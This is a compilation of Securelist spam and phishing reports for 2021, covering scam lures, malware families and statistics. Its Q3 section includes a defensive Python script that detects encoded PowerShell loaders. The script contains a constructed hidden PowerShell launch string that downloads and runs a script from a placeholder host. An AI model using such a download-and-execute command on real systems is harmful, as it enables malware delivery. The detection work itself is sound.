Tatyana Shcherbakova, Securelist

Spam and phishing in 2021
https://securelist.com/spam-and-phishing-in-2021/105713/
Wed, 09 Feb 2022 10:00:28 +0000

Figures of the year

In 2021:

  • 45.56% of e-mails were spam
  • 24.77% of spam was sent from Russia with another 14.12% from Germany
  • Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails
  • The most common malware family found in attachments was Agensla Trojans
  • Our Anti-Phishing system blocked 253 365 212 phishing links
  • Safe Messaging blocked 341 954 attempts to follow phishing links in messengers

How to make an unprofitable investment with no return

The subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their “investment projects” look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That’s how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they’d invite the “customer” to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.

Similar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.

Another trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. In order to make sure the investors didn’t think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be “processed”.

Films and events “streamed” on fake sites: not seeing is believing!

Online streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new Bond movie or the latest Spider-Man film appeared online shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim’s trust. They used official advertisements and provided a synopsis of the film on the website.

However, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content; the only difference was that visitors might not be able to watch anything at all without registering. Either way, the registration was not free. According to the information provided on the website, the registration fee would only be a symbolic figure, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.

A special offer from cybercriminals: try your hand at spamming

More and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, “prize winners” are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small “commission fee” to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.

Hurry up and lose your account: phishing in the corporate sector

The main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient’s attention. The attackers’ main objective was to trick the victim into following the link to a phishing page for entering login details. That’s why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.

The fake notification would often concern undelivered messages, which supposedly had to be accessed via some sort of “email Portal” or a similar resource.

Another noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient’s guard and prompt them to enter the username and password for their corporate account.

COVID-19

Scams

The subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim’s bank card details.

The sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There’s no guarantee that the code they’re selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.

The corporate sector

COVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail themselves of this promised support was to “confirm” their e-mail address by logging in to their account on the scam website.

Another malicious mailshot utilized e-mails with an attached HTML file called “Covid Test Result”. Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.

The “important message about vaccination” which supposedly lay unread in a recipient’s inbox also contained a link to a page belonging to attackers requesting corporate account details.

Another type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work, accompanied by the need to take urgent action and read a “2 months salary receipt”, was intended to make the recipient open the attachment containing the malicious object as quickly as possible.

COVID-19 vaccination

While authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people’s desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country’s National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.

In both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.

Another way to gain access to users’ personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.

The scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a “prize” page but told to pay a small necessary “commission fee” in order to receive it. The scammers received the money, but the victim got nothing as a result.

We also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as Trojan.MSOffice.SAgent.gen. SAgent malware is used at the initial stage of an attack to deliver other malware to the victim’s system.

Statistics: spam

Share of spam in mail traffic

On average, 45.56% of global mail traffic was spam in 2021. The figure fluctuated over the course of the year.

Share of spam in global e-mail traffic, 2021

We observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.

Source of spam by country or region

Like in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), who’ve also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China’s rose 2.52 p.p. compared to 2020.

Sources of spam by country or region in 2021

The Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as in 2020, Japan (2.36%) and Poland (1.66%). In total, over three quarters of the world’s spam was sent from these ten countries.

Malicious mail attachments

Dynamics of Mail Anti-Virus triggerings in 2021

In 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.

Malware families

The attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the Agensla family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by Badun Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the CVE-2017-11882 vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same number of attachments belonged to the Taskun family (3.93%), which creates malicious tasks in Windows Task Scheduler.

TOP 10 malware families spread by e-mail attachments in 2021

The fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for any version of Windows OS (3.63%) and for 32-bit versions (1.90%), respectively. Malicious ISO disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. Eighth place was taken by another exploited vulnerability in Equation Editor, CVE-2018-0802 (2.38%), while ninth place went to Androm backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.

TOP 10 types of malware spread by e-mail attachments in 2021

The ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.

Countries and regions targeted by malicious mailings

In 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files were blocked in Italy (5.78%).

Countries and regions targeted by malicious mailshots in 2021

Germany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%), whose share was just 0.01 p.p. higher than Germany’s. They’re followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries as in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).

Statistics: phishing

In 2021, our Anti-Phishing system blocked 253 365 212 phishing links. In total, 8.20% of Kaspersky users in different countries and regions around the world faced at least one phishing attack.

Map of phishing attacks

Geography of phishing attacks in 2021

Users living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It’s worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.

Mongolia (10.98%) found itself in fourth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were Réunion (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).

TOP 10 countries by share of users targeted in phishing attacks:

Country       Share of attacked users*
Brazil        12.39%
France        12.21%
Portugal      11.40%
Mongolia      10.98%
Réunion       10.97%
Brunei        10.89%
Madagascar    10.87%
Andorra       10.79%
Australia     10.74%
Ecuador       10.73%

* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021

Top-level domains

As in 2020, most of the phishing websites blocked in 2021 used a .com domain name; its share rose 7.19 p.p., reaching 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. Third place on the list was occupied by the Chinese country-code domain .cn (7.14%). The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attracts attackers for the same reason .xyz does.

Most frequent top-level domains for phishing pages in 2021

Organizations mimicked in phishing attacks

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database.

The demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.

Distribution of organizations most often mimicked by phishers, by category, 2021

Phishing in messengers

Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them.

In 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.

Distribution of links blocked by the Safe Messaging component, by messenger, 2021

On average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We observed a spike in phishing activity on WhatsApp in July, when Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can’t say for sure that there’s a connection between Whatreg activity and phishing in this messaging app, but it’s a possibility. We also observed another brief surge in phishing activity in the week from October 31 through November 6, 2021.

Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)

On average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.

Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)

A daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.

Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)

Conclusion

As we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes, two more of the year’s main themes, were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and used similar business-related baits. There were also some new trends, such as the investment scam, which is gaining momentum.

The key trends in phishing attacks and scams are likely to continue into the coming year. Fresh “investment projects” will replace their forerunners. “Prize draws” will alternate with holiday giveaways when there’s a special occasion to celebrate. Attacks on the corporate sector aren’t going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we’ll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.

Spam and phishing in Q3 2021
https://securelist.com/spam-and-phishing-in-q3-2021/104741/
Mon, 01 Nov 2021 12:00:26 +0000

Quarterly highlights

This summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were “official”, despite charging potential victims several times the real price of a ticket, and some just took the money and disappeared.

Scammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.

Soccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the “bonus” evaporated into thin air.

“Nigerian prince” scammers also kept a close eye on Q3’s sporting fixtures. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.

Some messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November — December 2022, yet scammers are already inventing giveaways related to it.

Among other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.

Scam: get it yourself, share with friends

In Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.

There were also plenty of “holiday deals” supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children’s World, a major chain of kids’ stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the “promotion” to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the “lucky ones” had to pay a small fee.

On a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the “winner” was promised as a prize a QR code that could supposedly be used to make purchases in the company’s stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a “commission” before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.

In 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly “reads cookies from the victim’s device to estimate their market value.” The “valuation” most often landed in the US$700–2,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.

If the victim agreed, they were asked to link their payment details to the account in the system and to top it up by €6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the €6 and payment details remained in the attackers’ possession.

Note that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity — in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.

Even in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded from such platforms. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to “pay for legal services relating to form registration”. The numerous positive reviews under the application, as well as the design mimicking real government sites, added credibility. We informed the store in question, which removed the fraudulent apps.

Spam support: call now, regret later

E-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim’s account.

COVID-19

New life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began “selling” their own. We also encountered rogue sites offering negative PCR test certificates. The “customer” was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.

Spam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the “Nigerian prince” scam.

However, “Nigerian prince” scams are not all that might await recipients of such messages. For example, the authors of spam exploiting the name of Argentina’s BBVA had a different objective. Users were invited to apply for a government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.

Cybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as Trojan.MSOffice.SAgent.gen, contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim’s system.
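Macro droppers of this kind rarely write the second-stage script to disk; they hand PowerShell a base64-encoded UTF-16LE command via -EncodedCommand. The report does not reproduce the SAgent macro, so the following is an added triage example rather than the sample’s own code: it decodes that argument and flags the download-cradle and window-hiding switches such a launch string usually carries. The command line and the stage-two URL are constructed for the example.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_PREFIXES = {"e", "ec"} | {"encodedcommand"[:n] for n in range(2, 15)}

# Switch patterns typical of macro-launched loaders; matched case-insensitively
# against the outer command line and the decoded payload together.
INDICATORS = {
    "hidden-window": re.compile(r"-w\w*\s+hidden", re.I),
    "bypass-execution-policy": re.compile(r"-ex\w*\s+bypass", re.I),
    "noprofile": re.compile(r"-nop\w*\b", re.I),
    "download-cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
        re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
}


def _is_encoded_flag(tok: str) -> bool:
    return len(tok) > 1 and tok[0] in "-/" and tok[1:].lower() in _ENC_PREFIXES


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or not valid base64."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            blob = tokens[i + 1].strip("\"'")
            try:
                raw = base64.b64decode(blob, validate=True)
            except (binascii.Error, ValueError):
                return None
            return raw.decode("utf-16-le", errors="replace")
    return None


def triage(cmdline: str) -> Dict[str, object]:
    """Decode the payload (if any) and list which loader indicators fire."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + "\n" + (decoded or "")
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return {"decoded": decoded, "indicators": hits}


# Constructed sample: the kind of launch string a malicious macro passes to the shell.
# Not taken from the SAgent sample; the URL is a placeholder.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example/loader.ps1')"
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand "
    + base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")
)

if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

Run it over process-creation telemetry (the command line of powershell.exe children of winword.exe or excel.exe) rather than over the document: the decoded script is what tells you which stage-two URL to block.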

Corporate privacy

A new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.

Statistics: spam

Share of spam in mail traffic

In Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% — down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.

Share of spam in global mail traffic, April – September 2021 (download)

In July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) — 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).

Source of spam by country

The top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).

Source of spam by country, Q3 2021 (download)

On the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).

Malicious mail attachments

Mail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.

Dynamics of Mail Anti-Virus triggerings, April – September 2021 (download)

During the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.

Malware families

In Q3 2021, Trojans from the Agensla family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim’s device. The share of the Badun family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the Noon spyware (5.19%), whose 32-bit relatives (1.71%) moved down to ninth. Meanwhile, the Taskun family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.

TOP 10 malware families in mail traffic, Q3 2021 (download)

The sixth place in TOP 10 common malware families in spam in Q3 was occupied by exploits for the CVE-2018-0802 vulnerability (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, exploits for which (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious ISO disk images (2.97%), and eighth to Androm backdoors (1.95%). Loaders from the Agent family again propped up the ranking (1.69%).

The TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.

TOP 10 malicious attachments in spam, Q3 2021 (download)

Countries targeted by malicious mailings

In Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country’s share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.

Countries targeted by malicious mailings, Q3 2021 (download)

Brazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).

Statistics: phishing

In Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.

Geography of phishing attacks

Brazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).

Geography of phishing attacks, Q3 2021 (download)

Top-level domains

The top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.

Top-level domain zones most commonly used for phishing, Q3 2021 (download)

The Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).

Organizations under phishing attack

The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

Global internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories “Social networks and blogs” (6.24%) and “IMs” (5.06%), respectively.

Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 (download)

The seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.

Phishing in messengers

Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them.

In Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.

Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 (download)

On WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though — on July 12–16 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.

Dynamics of phishing activity on WhatsApp, Q3 2021

As for Telegram, phishing activity there increased slightly towards the end of the quarter.

Dynamics of phishing activity on Telegram, Q3 2021

Takeaways

Next quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms — such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed — even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.

The COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.

Spam and phishing in Q2 2021 (https://securelist.com/spam-and-phishing-in-q2-2021/103548/, published Thu, 05 Aug 2021)

Quarterly highlights

The corporate sector

In Q2 2021, corporate accounts continued to be one of the most tempting targets for cybercriminals. To add to the credibility of links in emails, scammers imitated mailings from popular cloud services. This technique has been used many times before. A fake notification about a Microsoft Teams meeting or a request to view an important document traditionally takes the victim to a phishing login page asking for corporate account credentials.

Spam and phishing in Q2 2021: scam emails supposedly from Microsoft services and fake login pages

